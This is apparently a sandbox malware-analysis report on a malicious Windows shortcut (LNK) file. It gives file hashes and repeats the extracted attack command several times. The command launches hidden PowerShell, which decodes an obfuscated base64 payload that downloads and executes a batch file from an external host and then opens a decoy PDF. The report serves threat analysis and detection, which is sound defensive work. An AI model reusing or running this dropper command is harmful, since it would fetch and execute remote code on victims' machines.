Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
06335d22d3a0d3169a51b9be9805a8bf
Sha1
e3d3283eabadb560bd8273a4ee18a30d2a5005c7
Sha256
947592b5dd891ad8cfd2b496186e260021a4a9782b6d4de9da032b706f597673
Sha384
328faf9c5b0f52d6f44f412d9da1b44441059ad4d92c5bbed6a9e269668e5a1174e683e6a559f957dfdb8623d14d9d90
Sha512
3696252c8cd407943bad1000453d4c1c0143791b82546bdb258c3376bf28af7f4e8f914237b8625fa4c18241dc18a618ba463590d91b398999a72b9b5166f2aa
SSDeep
48:8t7lJWGWJrzKJLvv+RsduVhhuqWik9G3zLOAIfzib/MEe2HAXkuldw84J:8llJWGArzovv7mW99G3z1If+b/HHAUuo
TLSH
1E61D0242AF91158F0F3CFB17CF9B9E1D9AEFE225915852F00861B464D22710EDA1F3A
File Structure
06335d22d3a0d3169a51b9be9805a8bf
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /C echo QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK && start /min powershell.exe -WindowStyle Hidden -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"
Deobfuscated PowerShell

/c "echo" "QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK" && start "/min" "powershell.exe" -WindowStyle "Hidden" -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"
Deobfuscated PowerShell

/c "echo" "QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK" && start "/min" "powershell.exe" -WindowStyle "Hidden" -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"
06335d22d3a0d3169a51b9be9805a8bf (3.21 KB)
File Structure
06335d22d3a0d3169a51b9be9805a8bf
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /C echo QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK && start /min powershell.exe -WindowStyle Hidden -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"

Malicious

06335d22d3a0d3169a51b9be9805a8bf
Deobfuscated PowerShell

/c "echo" "QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK" && start "/min" "powershell.exe" -WindowStyle "Hidden" -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"

Malicious

06335d22d3a0d3169a51b9be9805a8bf > LNK CommandLine
Deobfuscated PowerShell

/c "echo" "QWNjb3JkaW5nIHRvIGFsbCBrbm93biBsYXdzCm9mIGF2aWF0aW9uLAoKdGhlcmUgaXMgbm8gd2F5IGEgYmVlCnNob3VsZCBiZSBhYmxlIHRvIGZseS4KCkl0cyB3aW5ncyBhcmUgdG9vIHNtYWxsIHRvIGdldAppdHMgZmF0IGxpdHRsZSBib2R5IG9mZiB0aGUgZ3JvdW5kLgoKVGhlIGJlZSwgb2YgY291cnNlLCBmbGllcyBhbnl3YXkK" && start "/min" "powershell.exe" -WindowStyle "Hidden" -c "$aowijqi='KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3JlYWxwaG90b2dyYXBoeS5jb20vYmFja3VwJywnQzpcV2luZG93c1xUYXNrc1xiYWNrdXAuYmF0Jyk7SUVYICdjOlxXaW5kb3dzXFRhc2tzXGJhY2t1cC5iYXQnO3dnZXQgcmVhbHBob3RvZ3JhcGh5LmNvbS9wZGYgLW8gIiRlbnY6dGVtcFxBcHBsaWNhdGlvbi1Gb3JtLnBkZiI7U3RhcnQtUHJvY2VzcyAiJGVudjp0ZW1wXEFwcGxpY2F0aW9uLUZvcm0ucGRmIg==';$EtRpa8h= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aowijqi));IEX $EtRpa8h"

Malicious

06335d22d3a0d3169a51b9be9805a8bf > LNK CommandLine > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙